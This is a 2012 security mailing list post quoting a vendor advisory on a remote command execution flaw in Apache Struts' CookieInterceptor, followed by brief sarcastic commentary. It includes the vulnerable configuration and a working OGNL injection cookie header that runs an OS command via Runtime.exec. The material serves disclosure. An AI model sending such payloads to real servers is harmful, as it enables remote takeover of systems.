Dailydave mailing list archives
Apache Struts
From: Dave Aitel <dave () immunityinc com>
Date: Fri, 06 Jan 2012 10:43:17 -0500
Just how bad is that Sec-Consult Apache Struts vulnerability...
(from their advisory)
___
2.) Remote command execution in Struts <= 2.3.1 (CookieInterceptor)
Given struts.xml is configured to handle all cookie names (independent
of limited cookie values):
<action name="Test" class="example.Test">
<interceptor-ref name="cookie">
<param name="cookiesName">*</param>
<param name="cookiesValue">1,2</param>
</interceptor-ref>
<result ...>
</action>
The following HTTP header will execute an OS command when sent to
Test.action:
Cookie: (#_memberAccess["allowStaticMethodAccess"]\u003dtrue)(x)=1;
x[@java.lang.Runtime@getRuntime().exec('calc')]=1
___
I assume Struts is extremely widely used and everyone is already owned?
Who was it who thought that OGNL was a good idea? Between this and .Net
being completely broken, the only platforms left are Ruby on Rails and
Python's Django! Oh, and PHP! :>
-dave
--
INFILTRATE 2012 January 12th-13th in Miami - the world's best offensive information security conference.
www.infiltratecon.com
